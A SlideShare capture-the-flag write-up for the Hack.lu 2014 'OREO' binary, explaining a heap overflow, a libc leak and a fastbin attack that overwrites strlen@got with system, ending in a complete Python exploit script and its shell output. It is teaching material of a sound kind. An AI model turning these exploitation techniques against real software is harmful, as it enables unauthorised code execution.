SlideShare ist ein Scribd-Unternehmen logo

OREO - Hack.lu CTF 2014

Y
YOKARO-MON

OREO Hack.lu CTF 2014 - Exploiting 400 points Writeup

Ingenieurwesen
1 von 31
Downloaden Sie, um offline zu lesen
OREO Hack.lu CTF 2014 - Exploiting 400 points you0708@YOKARO-MON
The Original Rifle Company has the most finest rifles and revolvers in whole Rodeo City! However their buildings are pretty secure, so your only chance to get into their offices is by hacking through the Original Rifle Ecommerce Online (OREO) System and steal all those pretty weapons from the inside! Makes sense right? Good luck! nc wildwildweb.fluxfingers.net 1414
Welcome to the OREO Original Rifle Ecommerce Online System! ,______________________________________ |_________________,----------._ [____] -,__ __....-----===== (_(||||||||||||)___________/ | `----------' OREO [ ))"-, | "" `, _,--....___ | `/ """" What would you like to do? 1. Add new rifle 2. Show added rifles 3. Order selected rifles 4. Leave a Message with your Order 5. Show current stats 6. Exit! Action: 1 Rifle name: hogehoge Rifle description: sample rifle Action: 2 Rifle to be ordered: =================================== Name: hogehoge Description: sample rifle =================================== Action:
Analysis
Surface Analysis • file • ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, stripped • checksec • CANARY : ENABLED • FORTIFY : disabled • NX : ENABLED • PIE : disabled • RELRO : disabled
Dynamic Analysis • We can order rifles 1. Select rifles you want to order • Need to specify rifle name & description 2. Submit an order for selected rifles • Can leave a message
Static Analysis • Reverse engineering using IDA
• Data structure of the rifle Static Analysis
Static Analysis • aa_rifle (Size = 0x38) Offset Size Name 0x00 0x19 description 0x19 0x1B name 0x34 4 last Fastbins
Reference: Heap Chunk • http://www.slideshare.net/bata_24/katagaitai-ctf-1-57598200
Reference: Heap Chunk • http://www.slideshare.net/bata_24/katagaitai-ctf-1-57598200
Understanding Rifle Management using GDB • After adding 2 rifles • After order size + flag, fd, bk “A” “a” “b”“B” It can be found from 0x0804A288 that stores address of last rifle
• After adding 2 rifles Heap Chunk 2 Chunk 1 Understanding Rifle Management Rifle 2 0x00000041 (size + flag) (prev size) Rifle 1 description name 0 0x00000041 (size + flag) (prev size) description name address of Rifle 1
• After order Heap Chunk 2 Chunk 1 Understanding Rifle Management 0x00000041 (size + flag) (prev size) 0x00000041 (size + flag) (prev size) 0x00000000 (fd) 0x00000000 (bk) address of Chunk 2 (fd) 0x00000000 (bk)
Vulnerability • Add command 1. Alloc 0x38 bytes heap (new rifle) 2. Connect to previous rifle 3. Input rifle’s name (max 0x38 bytes) 4. Input rifle’s description (max 0x38 bytes) 5. Add rifle counter
Vulnerability • You can do buffer-overflow as below Rifle description name last “A” * 0x38
Vulnerability • Or Rifle description name last“A” * 0x38
Exploitation
Memory Leakage • Overwrite last rifle address Heap Chunk 1 Rifle 1 description name 0 0x41 (size + flag) (prev size) Target data You can read target data as rifle’s description using show command “A” * 0x1B
 + address of target data
Fastbins Unlink Attack • Breaking fastbins chain Heap Freed
 Chunk 2 Reallocated Chunk 1 0x42 (size + flag) (prev size) 0x41 (size + flag) (prev size) address of Chunk 1 bk Rifle 3 description name 0 “A” * 0x1F
 + 0
 + 0
 + 0x41
 + address of target memory Target memory It used as a heap chunk after re- allocating Chunk 2 Add a rifle after free 2 rifles
Reference: Fastbins Unlink Attack • http://www.slideshare.net/bata_24/katagaitai-ctf-1-57598200 To avoid size check failure, you have to put a correct value into “size” (In this case, the value must be 0x41)
Making Fake Freed Chunk • You have to find the area that can be set to 0x41 when re-allocation Chunk 0x41 (size + flag) (prev size) fd bk You can use 0x804A2A0 as a freed chunk because rifle_counter can be set 0x41
Exploitation Process 1. Leak address of ibc functions 2. Calc address of “system” 3. Add rifles until rifle counter is 0x3F 4. Order rifles (free fastbins) 5. Breaking fastbins chain by adding a rifle 6. Allocate 0x804A2A0 as a heap chunk by adding a rifle 7. Overwrite GOT by leaving message 8. Get shell
Exploitation Process 2. Calc address of “system” • See http://pastebin.com/9vq38BYH
Exploitation Process 3. Add rifles until rifle counter is 0x3F 4. Order rifles (Free fastbins) while rifle_count < 0x3e: cmd_add("A"*27+p(0), "B") cmd_add("A", "B") cmd_order() To avoid to create many fast chunks,
 the “last” should be 0x00000000
Exploitation Process 6. Allocate 0x804A2A0 as a heap chunk by adding a rifle • Before allocation, rifle counter will be 0x41 • Its description must be addr of strlen@got Address Before After 0x804A2A0 orderd_counter prev_size 0x00000000 0x804A2A4 rifle_counter size + flag 0x00000041 0x804A2A8 lpMsg description address of strlen@got 0x804a2c1 msg_buf + 1 name “foobar" 0x804a2dc msg_buf + 0x1C last Unknown strlen@got is will be call the program after adding a rifle/leaving a message
Exploitation Process 7. Overwrite strlen@got by leaving a message • Now lpMsg points to strlen@got • Message should be p(libc_system) + “;sh x00" • “;shx00" will be used in next step
Exploitation Process 8. Get shell • Overwrote strlen will be called after adding the rifle • Its argument is the message:
 p(libc_system) + “;shx00” • It means the program will call
 system(“x??x??x??x??;sh”)
oreo.py s, f = sock("wildwildweb.fluxfingers.net", 1414) got_malloc = 0x0804A244 got_strlen = 0x0804A250 p_order_msg = 0x0804A2A8 rifle_count = 0 ready_action() cmd_add("A"*27+p(got_malloc-0x19), "B"*25) libc_malloc = u(cmd_show()[1][0][:4]) print("[*] got libc malloc: 0x%08x" % libc_malloc) libc_system = libc_malloc - 0x0007d950 + 0x00042af0 print("[*] got libc system: 0x%08x" % libc_system) while rifle_count < 0x3e: cmd_add("A"*27+p(0), "B") cmd_add("A", "B") cmd_order() cmd_add("A"*27+p(0)+p(0)+p(0x41)+p(p_order_msg-8), "B") cmd_add("A", "B") cmd_add("A", p(got_strlen)) cmd_msg(p(libc_system) + ";shx00", noread=True) print("[*] got shell") shell(s)
$ python oreo.py [*] rifle count: 0x01 [*] got libc malloc: 0xf76a2950 [*] got libc system: 0xf7667af0 [*] rifle count: 0x02 [*] rifle count: 0x03 (snip.) [*] rifle count: 0x3f [*] ordered [*] rifle count: 0x40 [*] rifle count: 0x41 [*] rifle count: 0x42 [*] got shell ls fl4g oreo cat fl4g flag{FASTBINS_ARE_NICE_ARENT_THEY}
Thank you!

Empfohlen

Receptor
ReceptorReceptor
Receptorramya bhairavi
 
Glucagon (The Guyton and Hall physiology)
Glucagon (The Guyton and Hall physiology)Glucagon (The Guyton and Hall physiology)
Glucagon (The Guyton and Hall physiology)Maryam Fida
 
Various routes of exposure of toxicant
Various routes of exposure of toxicant Various routes of exposure of toxicant
Various routes of exposure of toxicant AnishaChahar
 
forest conservation act 1980
forest conservation act 1980forest conservation act 1980
forest conservation act 1980NainaS2
 
Online Security
Online Security Online Security
Online Security JimWhite
 
FTIR AND ITS INTERPRETATION BY KARAN AJAY GUPTA
FTIR AND ITS INTERPRETATION BY KARAN AJAY GUPTAFTIR AND ITS INTERPRETATION BY KARAN AJAY GUPTA
FTIR AND ITS INTERPRETATION BY KARAN AJAY GUPTAroyal college of pharmacy
 
Status of heavy metals in agricultural soils and the need for adapted soil th...
Status of heavy metals in agricultural soils and the need for adapted soil th...Status of heavy metals in agricultural soils and the need for adapted soil th...
Status of heavy metals in agricultural soils and the need for adapted soil th...ExternalEvents
 
Bioaerosol sampling final
Bioaerosol sampling finalBioaerosol sampling final
Bioaerosol sampling finalLPE Learning Center
 

Empfohlen

Receptor
ReceptorReceptor
Receptorramya bhairavi
 
Glucagon (The Guyton and Hall physiology)
Glucagon (The Guyton and Hall physiology)Glucagon (The Guyton and Hall physiology)
Glucagon (The Guyton and Hall physiology)Maryam Fida
 
Various routes of exposure of toxicant
Various routes of exposure of toxicant Various routes of exposure of toxicant
Various routes of exposure of toxicant AnishaChahar
 
forest conservation act 1980
forest conservation act 1980forest conservation act 1980
forest conservation act 1980NainaS2
 
Online Security
Online Security Online Security
Online Security JimWhite
 
FTIR AND ITS INTERPRETATION BY KARAN AJAY GUPTA
FTIR AND ITS INTERPRETATION BY KARAN AJAY GUPTAFTIR AND ITS INTERPRETATION BY KARAN AJAY GUPTA
FTIR AND ITS INTERPRETATION BY KARAN AJAY GUPTAroyal college of pharmacy
 
Status of heavy metals in agricultural soils and the need for adapted soil th...
Status of heavy metals in agricultural soils and the need for adapted soil th...Status of heavy metals in agricultural soils and the need for adapted soil th...
Status of heavy metals in agricultural soils and the need for adapted soil th...ExternalEvents
 
Bioaerosol sampling final
Bioaerosol sampling finalBioaerosol sampling final
Bioaerosol sampling finalLPE Learning Center
 
IDA ユーザなら知っておくべきマントノン侯爵夫人にモテる 7つの法則
IDA ユーザなら知っておくべきマントノン侯爵夫人にモテる 7つの法則IDA ユーザなら知っておくべきマントノン侯爵夫人にモテる 7つの法則
IDA ユーザなら知っておくべきマントノン侯爵夫人にモテる 7つの法則勇 中津留
 
[CB16] ATM 詐欺を阻止する方法 by Olga Kochetova & Alexey Osipov
[CB16] ATM 詐欺を阻止する方法 by Olga Kochetova & Alexey Osipov[CB16] ATM 詐欺を阻止する方法 by Olga Kochetova & Alexey Osipov
[CB16] ATM 詐欺を阻止する方法 by Olga Kochetova & Alexey OsipovCODE BLUE
 
Return to dlresolve
Return to dlresolveReturn to dlresolve
Return to dlresolveAngel Boy
 
ВКонтакте: потребление контента
ВКонтакте: потребление контента ВКонтакте: потребление контента
ВКонтакте: потребление контента Рыжков Виталий
 
Daina Middleton, Global Head of Business Marketing, Twitter
Daina Middleton, Global Head of Business Marketing, TwitterDaina Middleton, Global Head of Business Marketing, Twitter
Daina Middleton, Global Head of Business Marketing, TwitterB&T Magazine
 
2016 Spring Saratogan
2016 Spring Saratogan2016 Spring Saratogan
2016 Spring SaratoganCity of Saratoga
 
Flyer
FlyerFlyer
FlyerPro Tray
 
копия прайс продукты_из_рая_111
копия прайс продукты_из_рая_111копия прайс продукты_из_рая_111
копия прайс продукты_из_рая_111Евгений Палыч
 
Bewitched and bothered
Bewitched and botheredBewitched and bothered
Bewitched and botheredEvlchemist
 
Mapas conceptuales y mentales
Mapas conceptuales y mentalesMapas conceptuales y mentales
Mapas conceptuales y mentalesverito velasquez
 
boeng early MRB 2
boeng early MRB 2boeng early MRB 2
boeng early MRB 2Douglas Queen
 
A2. MEP1 - Mod 1 - Tema2
A2. MEP1 - Mod 1 - Tema2A2. MEP1 - Mod 1 - Tema2
A2. MEP1 - Mod 1 - Tema2Poliana Bellan
 
MIN SHENG LINES - Profile
MIN SHENG LINES - ProfileMIN SHENG LINES - Profile
MIN SHENG LINES - ProfileMuhammad Bilal
 
Windows Debugging with WinDbg
Windows Debugging with WinDbgWindows Debugging with WinDbg
Windows Debugging with WinDbgArno Huetter
 
20190521 pwn 101_by_roy
20190521 pwn 101_by_roy20190521 pwn 101_by_roy
20190521 pwn 101_by_royRoy
 
[131]해커의 관점에서 바라보기
[131]해커의 관점에서 바라보기[131]해커의 관점에서 바라보기
[131]해커의 관점에서 바라보기NAVER D2
 
0x01 - Breaking into Linux VMs for Fun and Profit.pdf
0x01 - Breaking into Linux VMs for Fun and Profit.pdf0x01 - Breaking into Linux VMs for Fun and Profit.pdf
0x01 - Breaking into Linux VMs for Fun and Profit.pdfscribdsituation719
 
Basic arithmetic, instruction execution and program
Basic arithmetic, instruction execution and programBasic arithmetic, instruction execution and program
Basic arithmetic, instruction execution and programJyotiprakashMishra18
 
Heap Base Exploitation
Heap Base ExploitationHeap Base Exploitation
Heap Base ExploitationUTD Computer Security Group
 
PE102 - a Windows executable format overview (booklet V1)
PE102 - a Windows executable format overview (booklet V1)PE102 - a Windows executable format overview (booklet V1)
PE102 - a Windows executable format overview (booklet V1)Ange Albertini
 
The forgotten art of assembly
The forgotten art of assemblyThe forgotten art of assembly
The forgotten art of assemblyMarian Marinov
 
Chapter Eight(3)
Chapter Eight(3)Chapter Eight(3)
Chapter Eight(3)bolovv
 

Weitere ähnliche Inhalte

Andere mochten auch

IDA ユーザなら知っておくべきマントノン侯爵夫人にモテる 7つの法則
IDA ユーザなら知っておくべきマントノン侯爵夫人にモテる 7つの法則IDA ユーザなら知っておくべきマントノン侯爵夫人にモテる 7つの法則
IDA ユーザなら知っておくべきマントノン侯爵夫人にモテる 7つの法則勇 中津留
 
[CB16] ATM 詐欺を阻止する方法 by Olga Kochetova & Alexey Osipov
[CB16] ATM 詐欺を阻止する方法 by Olga Kochetova & Alexey Osipov[CB16] ATM 詐欺を阻止する方法 by Olga Kochetova & Alexey Osipov
[CB16] ATM 詐欺を阻止する方法 by Olga Kochetova & Alexey OsipovCODE BLUE
 
Return to dlresolve
Return to dlresolveReturn to dlresolve
Return to dlresolveAngel Boy
 
ВКонтакте: потребление контента
ВКонтакте: потребление контента ВКонтакте: потребление контента
ВКонтакте: потребление контента Рыжков Виталий
 
Daina Middleton, Global Head of Business Marketing, Twitter
Daina Middleton, Global Head of Business Marketing, TwitterDaina Middleton, Global Head of Business Marketing, Twitter
Daina Middleton, Global Head of Business Marketing, TwitterB&T Magazine
 
копия прайс продукты_из_рая_111
копия прайс продукты_из_рая_111копия прайс продукты_из_рая_111
копия прайс продукты_из_рая_111Евгений Палыч
 
Bewitched and bothered
Bewitched and botheredBewitched and bothered
Bewitched and botheredEvlchemist
 
Mapas conceptuales y mentales
Mapas conceptuales y mentalesMapas conceptuales y mentales
Mapas conceptuales y mentalesverito velasquez
 
A2. MEP1 - Mod 1 - Tema2
A2. MEP1 - Mod 1 - Tema2A2. MEP1 - Mod 1 - Tema2
A2. MEP1 - Mod 1 - Tema2Poliana Bellan
 
MIN SHENG LINES - Profile
MIN SHENG LINES - ProfileMIN SHENG LINES - Profile
MIN SHENG LINES - ProfileMuhammad Bilal
 

Andere mochten auch (13)

IDA ユーザなら知っておくべきマントノン侯爵夫人にモテる 7つの法則
IDA ユーザなら知っておくべきマントノン侯爵夫人にモテる 7つの法則IDA ユーザなら知っておくべきマントノン侯爵夫人にモテる 7つの法則
IDA ユーザなら知っておくべきマントノン侯爵夫人にモテる 7つの法則
 
[CB16] ATM 詐欺を阻止する方法 by Olga Kochetova & Alexey Osipov
[CB16] ATM 詐欺を阻止する方法 by Olga Kochetova & Alexey Osipov[CB16] ATM 詐欺を阻止する方法 by Olga Kochetova & Alexey Osipov
[CB16] ATM 詐欺を阻止する方法 by Olga Kochetova & Alexey Osipov
 
Return to dlresolve
Return to dlresolveReturn to dlresolve
Return to dlresolve
 
ВКонтакте: потребление контента
ВКонтакте: потребление контента ВКонтакте: потребление контента
ВКонтакте: потребление контента
 
Daina Middleton, Global Head of Business Marketing, Twitter
Daina Middleton, Global Head of Business Marketing, TwitterDaina Middleton, Global Head of Business Marketing, Twitter
Daina Middleton, Global Head of Business Marketing, Twitter
 
2016 Spring Saratogan
2016 Spring Saratogan2016 Spring Saratogan
2016 Spring Saratogan
 
Flyer
FlyerFlyer
Flyer
 
копия прайс продукты_из_рая_111
копия прайс продукты_из_рая_111копия прайс продукты_из_рая_111
копия прайс продукты_из_рая_111
 
Bewitched and bothered
Bewitched and botheredBewitched and bothered
Bewitched and bothered
 
Mapas conceptuales y mentales
Mapas conceptuales y mentalesMapas conceptuales y mentales
Mapas conceptuales y mentales
 
boeng early MRB 2
boeng early MRB 2boeng early MRB 2
boeng early MRB 2
 
A2. MEP1 - Mod 1 - Tema2
A2. MEP1 - Mod 1 - Tema2A2. MEP1 - Mod 1 - Tema2
A2. MEP1 - Mod 1 - Tema2
 
MIN SHENG LINES - Profile
MIN SHENG LINES - ProfileMIN SHENG LINES - Profile
MIN SHENG LINES - Profile
 

Ähnlich wie OREO - Hack.lu CTF 2014

Windows Debugging with WinDbg
Windows Debugging with WinDbgWindows Debugging with WinDbg
Windows Debugging with WinDbgArno Huetter
 
20190521 pwn 101_by_roy
20190521 pwn 101_by_roy20190521 pwn 101_by_roy
20190521 pwn 101_by_royRoy
 
[131]해커의 관점에서 바라보기
[131]해커의 관점에서 바라보기[131]해커의 관점에서 바라보기
[131]해커의 관점에서 바라보기NAVER D2
 
0x01 - Breaking into Linux VMs for Fun and Profit.pdf
0x01 - Breaking into Linux VMs for Fun and Profit.pdf0x01 - Breaking into Linux VMs for Fun and Profit.pdf
0x01 - Breaking into Linux VMs for Fun and Profit.pdfscribdsituation719
 
Basic arithmetic, instruction execution and program
Basic arithmetic, instruction execution and programBasic arithmetic, instruction execution and program
Basic arithmetic, instruction execution and programJyotiprakashMishra18
 
PE102 - a Windows executable format overview (booklet V1)
PE102 - a Windows executable format overview (booklet V1)PE102 - a Windows executable format overview (booklet V1)
PE102 - a Windows executable format overview (booklet V1)Ange Albertini
 
The forgotten art of assembly
The forgotten art of assemblyThe forgotten art of assembly
The forgotten art of assemblyMarian Marinov
 
Chapter Eight(3)
Chapter Eight(3)Chapter Eight(3)
Chapter Eight(3)bolovv
 
Runtime Symbol Resolution
Runtime Symbol ResolutionRuntime Symbol Resolution
Runtime Symbol ResolutionKen Kawamoto
 
APEX Connect 2019 - array/bulk processing in PLSQL
APEX Connect 2019 - array/bulk processing in PLSQLAPEX Connect 2019 - array/bulk processing in PLSQL
APEX Connect 2019 - array/bulk processing in PLSQLConnor McDonald
 
C Programming Training in Ambala ! Batra Computer Centre
C Programming Training in Ambala ! Batra Computer CentreC Programming Training in Ambala ! Batra Computer Centre
C Programming Training in Ambala ! Batra Computer Centrejatin batra
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Pluginsamiable_indian
 
Winter training,Readymade Projects,Buy Projects,Corporate Training
Winter training,Readymade Projects,Buy Projects,Corporate TrainingWinter training,Readymade Projects,Buy Projects,Corporate Training
Winter training,Readymade Projects,Buy Projects,Corporate TrainingTechnogroovy
 
OpenWorld 2018 - Common Application Developer Disasters
OpenWorld 2018 - Common Application Developer DisastersOpenWorld 2018 - Common Application Developer Disasters
OpenWorld 2018 - Common Application Developer DisastersConnor McDonald
 
Object Oriented Exploitation: New techniques in Windows mitigation bypass
Object Oriented Exploitation: New techniques in Windows mitigation bypassObject Oriented Exploitation: New techniques in Windows mitigation bypass
Object Oriented Exploitation: New techniques in Windows mitigation bypassSam Thomas
 
TDOH x 台科 pwn課程
TDOH x 台科 pwn課程TDOH x 台科 pwn課程
TDOH x 台科 pwn課程Weber Tsai
 
Symbolic Debugging with DWARF
Symbolic Debugging with DWARFSymbolic Debugging with DWARF
Symbolic Debugging with DWARFSamy Bahra
 
Hacklu11 Writeup
Hacklu11 WriteupHacklu11 Writeup
Hacklu11 Writeupnkslides
 

Ähnlich wie OREO - Hack.lu CTF 2014 (20)

Windows Debugging with WinDbg
Windows Debugging with WinDbgWindows Debugging with WinDbg
Windows Debugging with WinDbg
 
20190521 pwn 101_by_roy
20190521 pwn 101_by_roy20190521 pwn 101_by_roy
20190521 pwn 101_by_roy
 
[131]해커의 관점에서 바라보기
[131]해커의 관점에서 바라보기[131]해커의 관점에서 바라보기
[131]해커의 관점에서 바라보기
 
0x01 - Breaking into Linux VMs for Fun and Profit.pdf
0x01 - Breaking into Linux VMs for Fun and Profit.pdf0x01 - Breaking into Linux VMs for Fun and Profit.pdf
0x01 - Breaking into Linux VMs for Fun and Profit.pdf
 
Basic arithmetic, instruction execution and program
Basic arithmetic, instruction execution and programBasic arithmetic, instruction execution and program
Basic arithmetic, instruction execution and program
 
Heap Base Exploitation
Heap Base ExploitationHeap Base Exploitation
Heap Base Exploitation
 
PE102 - a Windows executable format overview (booklet V1)
PE102 - a Windows executable format overview (booklet V1)PE102 - a Windows executable format overview (booklet V1)
PE102 - a Windows executable format overview (booklet V1)
 
The forgotten art of assembly
The forgotten art of assemblyThe forgotten art of assembly
The forgotten art of assembly
 
Chapter Eight(3)
Chapter Eight(3)Chapter Eight(3)
Chapter Eight(3)
 
Runtime Symbol Resolution
Runtime Symbol ResolutionRuntime Symbol Resolution
Runtime Symbol Resolution
 
APEX Connect 2019 - array/bulk processing in PLSQL
APEX Connect 2019 - array/bulk processing in PLSQLAPEX Connect 2019 - array/bulk processing in PLSQL
APEX Connect 2019 - array/bulk processing in PLSQL
 
C Programming Training in Ambala ! Batra Computer Centre
C Programming Training in Ambala ! Batra Computer CentreC Programming Training in Ambala ! Batra Computer Centre
C Programming Training in Ambala ! Batra Computer Centre
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
 
Winter training,Readymade Projects,Buy Projects,Corporate Training
Winter training,Readymade Projects,Buy Projects,Corporate TrainingWinter training,Readymade Projects,Buy Projects,Corporate Training
Winter training,Readymade Projects,Buy Projects,Corporate Training
 
OpenWorld 2018 - Common Application Developer Disasters
OpenWorld 2018 - Common Application Developer DisastersOpenWorld 2018 - Common Application Developer Disasters
OpenWorld 2018 - Common Application Developer Disasters
 
Object Oriented Exploitation: New techniques in Windows mitigation bypass
Object Oriented Exploitation: New techniques in Windows mitigation bypassObject Oriented Exploitation: New techniques in Windows mitigation bypass
Object Oriented Exploitation: New techniques in Windows mitigation bypass
 
Data type
Data typeData type
Data type
 
TDOH x 台科 pwn課程
TDOH x 台科 pwn課程TDOH x 台科 pwn課程
TDOH x 台科 pwn課程
 
Symbolic Debugging with DWARF
Symbolic Debugging with DWARFSymbolic Debugging with DWARF
Symbolic Debugging with DWARF
 
Hacklu11 Writeup
Hacklu11 WriteupHacklu11 Writeup
Hacklu11 Writeup
 

Kürzlich hochgeladen

UNIT-2 image enhancement.pdf Image Processing Unit 2 AKTU
UNIT-2 image enhancement.pdf Image Processing Unit 2 AKTUUNIT-2 image enhancement.pdf Image Processing Unit 2 AKTU
UNIT-2 image enhancement.pdf Image Processing Unit 2 AKTUankushspencer015
 
Dynamo Scripts for Task IDs and Space Naming.pptx
Dynamo Scripts for Task IDs and Space Naming.pptxDynamo Scripts for Task IDs and Space Naming.pptx
Dynamo Scripts for Task IDs and Space Naming.pptxMustafa Ahmed
 
1893-part-1-2016 for Earthquake load design
1893-part-1-2016 for Earthquake load design1893-part-1-2016 for Earthquake load design
1893-part-1-2016 for Earthquake load designAshishSingh1301
 
Operating System chapter 9 (Virtual Memory)
Operating System chapter 9 (Virtual Memory)Operating System chapter 9 (Virtual Memory)
Operating System chapter 9 (Virtual Memory)NareenAsad
 
Multivibrator and its types defination and usges.pptx
Multivibrator and its types defination and usges.pptxMultivibrator and its types defination and usges.pptx
Multivibrator and its types defination and usges.pptxalijaker017
 
Seizure stage detection of epileptic seizure using convolutional neural networks
Seizure stage detection of epileptic seizure using convolutional neural networksSeizure stage detection of epileptic seizure using convolutional neural networks
Seizure stage detection of epileptic seizure using convolutional neural networksIJECEIAES
 
Instruct Nirmaana 24-Smart and Lean Construction Through Technology.pdf
Instruct Nirmaana 24-Smart and Lean Construction Through Technology.pdfInstruct Nirmaana 24-Smart and Lean Construction Through Technology.pdf
Instruct Nirmaana 24-Smart and Lean Construction Through Technology.pdfEr.Sonali Nasikkar
 
The battle for RAG, explore the pros and cons of using KnowledgeGraphs and Ve...
The battle for RAG, explore the pros and cons of using KnowledgeGraphs and Ve...The battle for RAG, explore the pros and cons of using KnowledgeGraphs and Ve...
The battle for RAG, explore the pros and cons of using KnowledgeGraphs and Ve...Roi Lipman
 
Linux Systems Programming: Semaphores, Shared Memory, and Message Queues
Linux Systems Programming: Semaphores, Shared Memory, and Message QueuesLinux Systems Programming: Semaphores, Shared Memory, and Message Queues
Linux Systems Programming: Semaphores, Shared Memory, and Message QueuesRashidFaridChishti
 
The Entity-Relationship Model(ER Diagram).pptx
The Entity-Relationship Model(ER Diagram).pptxThe Entity-Relationship Model(ER Diagram).pptx
The Entity-Relationship Model(ER Diagram).pptxMANASINANDKISHORDEOR
 
Maher Othman Interior Design Portfolio..
Maher Othman Interior Design Portfolio..Maher Othman Interior Design Portfolio..
Maher Othman Interior Design Portfolio..MaherOthman7
 
Activity Planning: Objectives, Project Schedule, Network Planning Model. Time...
Activity Planning: Objectives, Project Schedule, Network Planning Model. Time...Activity Planning: Objectives, Project Schedule, Network Planning Model. Time...
Activity Planning: Objectives, Project Schedule, Network Planning Model. Time...Lovely Professional University
 
Tembisa Central Terminating Pills +27838792658 PHOMOLONG Top Abortion Pills F...
Tembisa Central Terminating Pills +27838792658 PHOMOLONG Top Abortion Pills F...Tembisa Central Terminating Pills +27838792658 PHOMOLONG Top Abortion Pills F...
Tembisa Central Terminating Pills +27838792658 PHOMOLONG Top Abortion Pills F...drjose256
 
Module-III Varried Flow.pptx GVF Definition, Water Surface Profile Dynamic Eq...
Module-III Varried Flow.pptx GVF Definition, Water Surface Profile Dynamic Eq...Module-III Varried Flow.pptx GVF Definition, Water Surface Profile Dynamic Eq...
Module-III Varried Flow.pptx GVF Definition, Water Surface Profile Dynamic Eq...Nitin Sonavane
 
Developing a smart system for infant incubators using the internet of things ...
Developing a smart system for infant incubators using the internet of things ...Developing a smart system for infant incubators using the internet of things ...
Developing a smart system for infant incubators using the internet of things ...IJECEIAES
 
8th International Conference on Soft Computing, Mathematics and Control (SMC ...
8th International Conference on Soft Computing, Mathematics and Control (SMC ...8th International Conference on Soft Computing, Mathematics and Control (SMC ...
8th International Conference on Soft Computing, Mathematics and Control (SMC ...josephjonse
 
Electrical shop management system project report.pdf
Electrical shop management system project report.pdfElectrical shop management system project report.pdf
Electrical shop management system project report.pdfKamal Acharya
 
21P35A0312 Internship eccccccReport.docx
21P35A0312 Internship eccccccReport.docx21P35A0312 Internship eccccccReport.docx
21P35A0312 Internship eccccccReport.docxrahulmanepalli02
 
handbook on reinforce concrete and detailing
handbook on reinforce concrete and detailinghandbook on reinforce concrete and detailing
handbook on reinforce concrete and detailingAshishSingh1301
 
Online crime reporting system project.pdf
Online crime reporting system project.pdfOnline crime reporting system project.pdf
Online crime reporting system project.pdfKamal Acharya
 

Kürzlich hochgeladen (20)

UNIT-2 image enhancement.pdf Image Processing Unit 2 AKTU
UNIT-2 image enhancement.pdf Image Processing Unit 2 AKTUUNIT-2 image enhancement.pdf Image Processing Unit 2 AKTU
UNIT-2 image enhancement.pdf Image Processing Unit 2 AKTU
 
Dynamo Scripts for Task IDs and Space Naming.pptx
Dynamo Scripts for Task IDs and Space Naming.pptxDynamo Scripts for Task IDs and Space Naming.pptx
Dynamo Scripts for Task IDs and Space Naming.pptx
 
1893-part-1-2016 for Earthquake load design
1893-part-1-2016 for Earthquake load design1893-part-1-2016 for Earthquake load design
1893-part-1-2016 for Earthquake load design
 
Operating System chapter 9 (Virtual Memory)
Operating System chapter 9 (Virtual Memory)Operating System chapter 9 (Virtual Memory)
Operating System chapter 9 (Virtual Memory)
 
Multivibrator and its types defination and usges.pptx
Multivibrator and its types defination and usges.pptxMultivibrator and its types defination and usges.pptx
Multivibrator and its types defination and usges.pptx
 
Seizure stage detection of epileptic seizure using convolutional neural networks
Seizure stage detection of epileptic seizure using convolutional neural networksSeizure stage detection of epileptic seizure using convolutional neural networks
Seizure stage detection of epileptic seizure using convolutional neural networks
 
Instruct Nirmaana 24-Smart and Lean Construction Through Technology.pdf
Instruct Nirmaana 24-Smart and Lean Construction Through Technology.pdfInstruct Nirmaana 24-Smart and Lean Construction Through Technology.pdf
Instruct Nirmaana 24-Smart and Lean Construction Through Technology.pdf
 
The battle for RAG, explore the pros and cons of using KnowledgeGraphs and Ve...
The battle for RAG, explore the pros and cons of using KnowledgeGraphs and Ve...The battle for RAG, explore the pros and cons of using KnowledgeGraphs and Ve...
The battle for RAG, explore the pros and cons of using KnowledgeGraphs and Ve...
 
Linux Systems Programming: Semaphores, Shared Memory, and Message Queues
Linux Systems Programming: Semaphores, Shared Memory, and Message QueuesLinux Systems Programming: Semaphores, Shared Memory, and Message Queues
Linux Systems Programming: Semaphores, Shared Memory, and Message Queues
 
The Entity-Relationship Model(ER Diagram).pptx
The Entity-Relationship Model(ER Diagram).pptxThe Entity-Relationship Model(ER Diagram).pptx
The Entity-Relationship Model(ER Diagram).pptx
 
Maher Othman Interior Design Portfolio..
Maher Othman Interior Design Portfolio..Maher Othman Interior Design Portfolio..
Maher Othman Interior Design Portfolio..
 
Activity Planning: Objectives, Project Schedule, Network Planning Model. Time...
Activity Planning: Objectives, Project Schedule, Network Planning Model. Time...Activity Planning: Objectives, Project Schedule, Network Planning Model. Time...
Activity Planning: Objectives, Project Schedule, Network Planning Model. Time...
 
Tembisa Central Terminating Pills +27838792658 PHOMOLONG Top Abortion Pills F...
Tembisa Central Terminating Pills +27838792658 PHOMOLONG Top Abortion Pills F...Tembisa Central Terminating Pills +27838792658 PHOMOLONG Top Abortion Pills F...
Tembisa Central Terminating Pills +27838792658 PHOMOLONG Top Abortion Pills F...
 
Module-III Varried Flow.pptx GVF Definition, Water Surface Profile Dynamic Eq...
Module-III Varried Flow.pptx GVF Definition, Water Surface Profile Dynamic Eq...Module-III Varried Flow.pptx GVF Definition, Water Surface Profile Dynamic Eq...
Module-III Varried Flow.pptx GVF Definition, Water Surface Profile Dynamic Eq...
 
Developing a smart system for infant incubators using the internet of things ...
Developing a smart system for infant incubators using the internet of things ...Developing a smart system for infant incubators using the internet of things ...
Developing a smart system for infant incubators using the internet of things ...
 
8th International Conference on Soft Computing, Mathematics and Control (SMC ...
8th International Conference on Soft Computing, Mathematics and Control (SMC ...8th International Conference on Soft Computing, Mathematics and Control (SMC ...
8th International Conference on Soft Computing, Mathematics and Control (SMC ...
 
Electrical shop management system project report.pdf
Electrical shop management system project report.pdfElectrical shop management system project report.pdf
Electrical shop management system project report.pdf
 
21P35A0312 Internship eccccccReport.docx
21P35A0312 Internship eccccccReport.docx21P35A0312 Internship eccccccReport.docx
21P35A0312 Internship eccccccReport.docx
 
handbook on reinforce concrete and detailing
handbook on reinforce concrete and detailinghandbook on reinforce concrete and detailing
handbook on reinforce concrete and detailing
 
Online crime reporting system project.pdf
Online crime reporting system project.pdfOnline crime reporting system project.pdf
Online crime reporting system project.pdf
 

OREO - Hack.lu CTF 2014

